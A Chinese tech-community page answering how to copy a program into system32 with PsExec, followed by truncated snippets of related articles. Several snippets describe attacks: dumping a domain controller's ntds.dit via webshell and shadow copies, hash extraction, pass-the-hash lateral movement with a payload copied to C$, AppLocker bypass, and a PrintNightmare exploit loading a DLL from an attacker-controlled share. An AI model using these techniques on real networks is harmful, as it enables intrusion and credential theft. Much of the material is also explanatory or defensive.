首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

PsExec:将我的程序复制到“system32”文件夹中

您好!您提到的PsExec是一个Windows系统管理工具,它允许您在本地或远程计算机上执行命令和脚本。将程序复制到“system32”文件夹中可以使其在计算机上运行。

PsExec是由Sysinternals公司开发的,它可以让您在本地或远程计算机上执行命令和脚本。它可以让您远程管理计算机,并且可以在计算机上执行各种任务,例如启动和停止服务、安装和卸载软件等。

将程序复制到“system32”文件夹中可以使其在计算机上运行,但是这需要管理员权限。如果您没有管理员权限,则需要联系管理员来完成此操作。

您可以使用PsExec将程序复制到“system32”文件夹中,例如:

代码语言:txt
复制
psexec \\computername -u username -p password copy c:\myfolder\myprogram.exe c:\windows\system32

这将将myprogram.exe复制到计算机的“system32”文件夹中。

需要注意的是,PsExec需要管理员权限才能运行,因此您需要确保您有足够的权限才能使用它。此外,PsExec可能会受到防火墙和安全策略的限制,因此您需要确保您的计算机和网络允许使用PsExec。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

找出文件夹(及其子文件夹)文件并复制到目标文件夹

程序源码 2.2....测试结果 文本提示 找出文件夹(及其子文件夹)文件并复制到目标文件夹 1.问题引出 下载了整个2018年和2019年上半年经济学人,不过是根据发刊日期建立了多个文件夹,我想复制出里面所有的*.epub...而且为了便于按照名字排序,最后复制后名字做了处理,只保留了文件名数字(经济学人发布年份,因为不是一个人发布名字多少不统一。...程序源码 # UTF-8 # 整理文件 # 将指定目录下对应格式文件(eg.epub)复制到指定目录 # ------------------------------------ import...path: "文件夹"和"文件"所在路径 :return: (list_folders, list_files) :list_folders: 文件夹

3.1K20

psexec提权删除残留显卡驱动文件

Windows\System32目录下然后以Administrator身份在cmd命令行执行psexec.exe -accepteula -nobanner -i -s powershellpsexec.exe...-nobanner -i -s cmdpsexec后面的参数-accepteula -nobanner 是接受协议、隐藏回显头部信息,可有可无,主要是后面的-is简单记的话就是psexec -is...cmd或psexec -is powershell,执行后会打开一个有system权限(比Administrator权限大)窗口,在这个窗口里执行你想执行命令,比如删除某个有权限保护但没啥用文件夹...,例如卸载显卡驱动,已经从appwiz.cpl程序列表卸载了,但C:\Windows\System32\DriverStore\FileRepository\目录还残留有计算型驱动nv_disp打头和渲染型驱动...nvgrid打头2个文件夹,正常删除是删不了,得提权后执行删除命令(cmd执行)rd /s /q C:\Windows\System32\DriverStore\FileRepository\nv_dispswi.inf_amd64

1.4K10
  • 通过Webshell远程导出域控ntds.dit方法

    这个任务可以通过使用“psexec”来完成,我们只需在“copy”命令中指定目标AD域控机器IP,域管理员用户名和密码即可,请使用SMB将ndts.dit和SYSTEM文件从卷影副本复制到LABONE...这里,我将这些文件复制到了我转储psexec文件同一目录下。...可以看到out.txt文件已生成在了目录,让我们来查看下其中内容。 ? “out.txt”文件内容显示,目标域控机器到目前为止并没有任何卷影副本。...用于创建c盘卷影副本命令如下: vssadmin create shadow /for=C: 我们需要有新创建“C”盘卷影副本名称它将在命令输出,因此我们将把上述命令输出重定向到我们拥有web...\box\ps\out.txt”文件

    1.4K10

    如何让软件以 System 权限运行

    使用 PsExec 可以让软件以 System 账户运行 我最近开发 WPF 小工具需要在用户端被一个 System 权限服务运行,我想调试这个 System 权限运行程序,此时快速方法是通过...PsExec 运行程序,同时在程序里面输出文件日志 从官网 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 下载最新版 PsExec...工具,通过管理员权限运行 假设需要运行程序是 foo.exe 那么通过下面命令行可以让 foo.exe 以 System 权限运行 psexec -s foo.exe 那么用 system 帐号运行程序使用下面代码返回值有什么不同...System.Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) 使用 SYSTEM 账户将映射 C:\windows\system32...\config\systemprofile\appdata 文件夹 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。

    2.6K20

    CVE-2021-1675 Windows Print Spooler RCE EXP

    attackerip\Evil.dll pDriverPath=C.dll 它将 A、B 和 C 复制到文件夹 C:\Windows\System32\spool\drivers\x64\3\new。...这将使我们 evildll Evil.dll 被复制到 C:\Windows\System32\spool\drivers\x64\3\ Evil.dll。...它将加载我们邪恶 dll。不幸是,它不起作用。因为如果你在文件夹C:\Windows\System32\spool\drivers\x64\3设置了A、B、C。文件复制会出现访问冲突。...为了绕过这个,我们需要使用驱动程序升级备份功能。如果我们升级某些驱动程序,旧版本将备份到 C:\Windows\System32\spool\drivers\x64\3\old\1\ 文件夹。...然后我们可以绕过访问冲突并成功将我 evil.dll 注入到 spooler 服务。 成功加载我们dll: 用法 .

    1.2K20

    导出域内用户hash几种方法

    这些文件将被解压缩到当前工作目录或指定任何其他文件夹。 Import-Module ....将生成两个新文件夹:Active Directory和Registry。NTDS.DIT文件将保存在Active Directory,SAM和SYSTEM文件将保存到Registry文件夹。 ?...从Windows命令提示符执行以下操作将创建C:驱动器快照,以便用户通常将无法访问文件将其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。...由于C:驱动器所有文件都已复制到另一个位置(HarddiskVolumeShadowCopy1),因此它们不会被操作系统直接使用,因此可以访问并复制到另一个位置。...命令副本并将NTDS.DIT和SYSTEM文件复制到名为ShadowCopy本地驱动器上新创建文件夹。 copy \\?

    4.9K40

    Petya 勒索软件新变种详细分析报告

    Petya勒索病毒变种中毒后会扫描内网机器,通过永恒之蓝漏洞自传播到内网机器,也通过渗透攻击获取内网域管理员账号密码信息,wmic或者psexec远程命令执行,达到快速传播目的。...2)获取本地密码 Dll文件自带融合了mimikatz功能资源,在运行过程,会释放出解密后资源,对比mimikatz与解密后资源文件如下: [1498792327361_6468_1498792327537...3)将自身复制到内网其他机器admin$共享目录。...其实就是psexec,用于远程执行命令。...、并加密MFT; 3、显示红色勒索界面,让用户输入秘钥; 细节分析: MBR启动后,将1-21扇区数据复制到8000地址处,然后Jmp执行8000地址代码 [1498792677945_6772

    1.2K00

    VBA实用小程序72:遍历文件夹(和子文件夹文件

    很多时候,我们都想要遍历文件夹每个文件,例如在工作表列出所有文件名、对每个文件进行修改。VBA给我们提供了一些方式:(1)Dir函数;(2)File System Object。...使用Dir函数 Dir函数是一个内置VBA函数,可用于可使用VBA任何应用程序。...图1 后期绑定 后期绑定不需要任何特定操作来启用FSO库,确保在VBA代码需要时打开库。 遍历文件夹中所有文件 下面的示例代码将文件名打印到立即窗口,很容易修改这些代码以更适合你具体情况。...当文件存储在子文件夹时,可能就需要一些技巧了。...现在需要找到一种方法来钻取到这些子文件夹。我们将使用上述相同Dir和FSO方法。为了确保这些代码可以处理任意数量文件夹,宏实际上会调用自身(一种称为递归技术)。

    10.4K30

    域渗透学习

    一、Kerbers协议NTLM认证 Kerberos是一种由MIT提出一种计算机网络授权协议,旨在通过使用加密技术为客户端/服务端应用程序提供强大认证服务。...GPP域控给域成员添加账号信息以xml形式保存在域内主机,可以直接读取xml文件拿到账号密码。所以在拿下域内主机之后一定要打开访问域策略共享文件夹,可以看到拿到域主机被下发了哪些策略。...同时,存放在Sysvol文件夹信息会复制到域中所有DC上 域服务器一般都会共享这个文件夹,或者搜索当前机器下XML文件将包含凭据: 映射驱动(Drives.xml) 数据源(DataSources.xml...\c$ # 调用cmd psexec.exe \\域控IP cmd.exe ---- 中继hash攻击 在hash无法解密情况下也可以通过中继NTLMv2哈希方法来获取网络机器shell访问权限...将证书文件复制到mimikaz同级目录下。

    1.6K31

    内网渗透测试:内网横向移动基础总结

    如,我们列出DC上C盘目录: dir \\192.168.183.130\c$ 再如将文件复制到目标主机DCC盘上面去:(在实战,我们可以将木马程序复制到目标主机上去) copy C:\Users...然后使用copy命令远程操作,将metasploit生成payload文件复制到目标系统C盘: copy shell.exe \\192.168.183.130\c$ 4....然后使用copy命令远程操作,将metasploit生成payload文件shell.exe复制到目标系统C盘。 3. 在目标主机DC上创建一个名称为“backdoor”计划任务。...通过DCOM,客户端程序对象能够向网络另一台计算机上服务器程序对象发送请求。 下面通过一个实验来讲解如何使用DCOM在远程主机上面执行命令。...然后在Windows7跳板机上传metasploit木马程序shell.exe,并使用copy命令将shell.exe复制到DCc盘上面去。 3.

    3.3K10

    Windows权限提升之AppLocker绕过

    设置默认规则仅允许从 C:\Windows\* 或 C:\Program Files\* 执行可执行文件和脚本。这意味着我们只能从这些文件夹或其中任何子文件夹(从通配符)执行脚本。...现在,我们需要做就是将我们尝试运行可执行文件复制到我们已确认用户可以写入标准文件夹之一。...需要注意是,当从 ADS 执行文件时,它会打开一个新窗口来运行程序。如果我们在反向 shell 工作,这将是一个问题,因为我们将看不到 PEAS 输出。...由于 C:\Program Files 没有任何可供标准用户写入默认文件夹/文件,因此我们需要关注非默认文件夹。...如果我们可以在这里编写,那么我们可以将可执行文件复制到该目录并执行它们。

    45050

    解决win10下git闪退

    问题描述 在git官网下载了软件,安装之后,git Bash出现闪退现象,同时在当前文件夹下面会生成一个mintty.exe.stackdump文件。...如下图所示,根据路径C:\Windows\System32\drivers,来到这个目录下,找到null.sys文件。这是一个系统配置文件,我们要把它替换成我们刚刚下载那个文件。...为了以防万一,我们可以先将原本这个文件复制到桌面做个备份。 ?...将上图目录下null.sys文件删除,将我们下载文件复制到这个目录下,如果系统提示我们没有权限,可以采用360杀毒软件强制删除。...4.文件替换完成之后,我们来到C:\Windows\System32目录下,找到cmd.exe文件,右键点击文件,选择【以管理员身份运行】。 ?

    1.4K20

    【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

    是Windows子系统内核部分,是一个内核模式设备驱动程序,它 包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。...如果Windows内核模式驱动程序不正确地处 理内存对象,则存在一个特权提升漏洞。成功利用此漏洞攻击者可以运行内核模式任意代 码。...攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限新帐户。...1.wmic 内部:(系统自带命令 单执行 无回显) win10 使用该命令会报错 ‘vmic’ 不是内部或外部命令,也不是可运行程序 或批处理文件。...在Win10,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic 只需要添加C:\Windows\System32

    7810

    计划任务攻防战 | Window 应急响应

    -s regedit 这里可以看到 Id、Index、SD ,按照文章描述,修改 Index 和 SD 都可以完成隐藏 尝试将 Index 值设置为 0 计划任务程序刷新 发现计划任务 test1...SD 复制给它,这样就能在计划任务程序显示了,可以直接删除 0x03 将上面两种结合起来什么效果 直接给出结论吧 计划任务程序看不到计划任务 日志管理器可以看到 两种方法排查脚本可以看到 删除时补...-s regedit 尝试删除 SD一部分,例如删除结尾一个 00 刷新计划任务程序 没有什么影响,看来删除不够多,尝试删除一半 刷新计划任务程序 果然又消失了 3....不着急直接变成变态,我们先尝试将文件夹计划任务test5删除掉 不耽误计划任务执行 开始变态,删除掉 testdir 不耽误计划任务执行 12....,不耽误 不保留计划任务注册表项 删除注册表计划任务 删除注册表计划任务文件夹 直接将计划任务注册表搞坏 其实这几种都是一样,因为计划任务服务会“缓存”计划任务配置,所以修改注册表后,只有在计划任务服务重启后

    82010

    Windows提权总结(超详细)

    SC命令是XP系统功能强大DOS命令,SC是用于与服务控制管理器和服务进行通信命令行程序。 通俗理解就是SC可以启动一个服务,命令如下。.../PSTools.zip 提权命令 : 使用管理员身份运行Cmd输入“Psexec -i -s -d cmd”命令提权: psexec -i -s -d cmd 提权命令: psexec.exe -...;更改账户类型 - 更改UAC设置 - 安装ActiveX;安装、卸载程序 - 安装设备驱动程序 - 将文件移动/复制到ProgramFiles或Windows目录下 - 查看其它用户文件夹 绕过...UAC几种思路 - 白名单劫持(利用白名单程序是该程序以系统权限启动且不用通知用户,只要我们找到相关程序劫持它,此时只要程序启动,也会带着我们程序以系统权限启动。)...Windows查找DLL目录及其顺序如下: 1、应用程序加载目录 2、C:\Windows\System32 3、C:\Windows\System 4、C:\Windows 5、当前工作目录

    37410

    OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

    令牌信息包括与进程或线程关联用户帐户标识和特权。当用户登录时,系统通过将用户密码与安全数据库存储信息进行比较来验证用户密码。验证用户凭证后,系统将生成访问令牌。...Red Canary撰写了一篇有关检测它出色文章。Cobalt Strike有两个内置PsExec,一个称为PsExec,另一个称为PsExec(psh)。...\host.domainC$WindowsTempbuild.xml" 在Cobalt Strike,有一个Aggressor Script扩展程序,该扩展程序使用MSBuild执行Powershell...DCOM 组件对象模型(COM)是具有不同应用程序和语言进程使用一种协议,因此它们彼此通信。 COM对象不能在引入了分布式COM(DCOM)协议网络上使用。....hta文件是Microsoft HTML应用程序文件,允许在HTML应用程序执行Visual Basic脚本。

    4.1K10

    域渗透-横向移动命令总结

    ;/TN,指定要创建计划任务名称;/SC,指定计划任务执行频率 #/M0,指定计划任务执行周期;/TR,指定计划任务运行程序路径;/RU,指定计划任务运行用户权限 #/F,如果指定任务已经存在...PsExec原理是通过SMB连接到服务端Admin$共享,并释放名为“psexesvc..exe”二进制文件,然后注册名为“PSEXESVC”服务。...当客户端执行命令时,服务端通过PSEXESVC服务启动相应程序执行命令并回显数据。运行结束后,PSEXESVC服务会 被删除。...目前有两种常见利用方法: 一是通过调用WMI类方法进行远程执行,如Win32 Process类Create方法可以在远程主机上创建进程,Win32 Product类Install方法可以在远程主机上安装恶意...,并每隔60秒执行一次SMB共享攻击载荷,使远程主机上线。

    2.3K10
    领券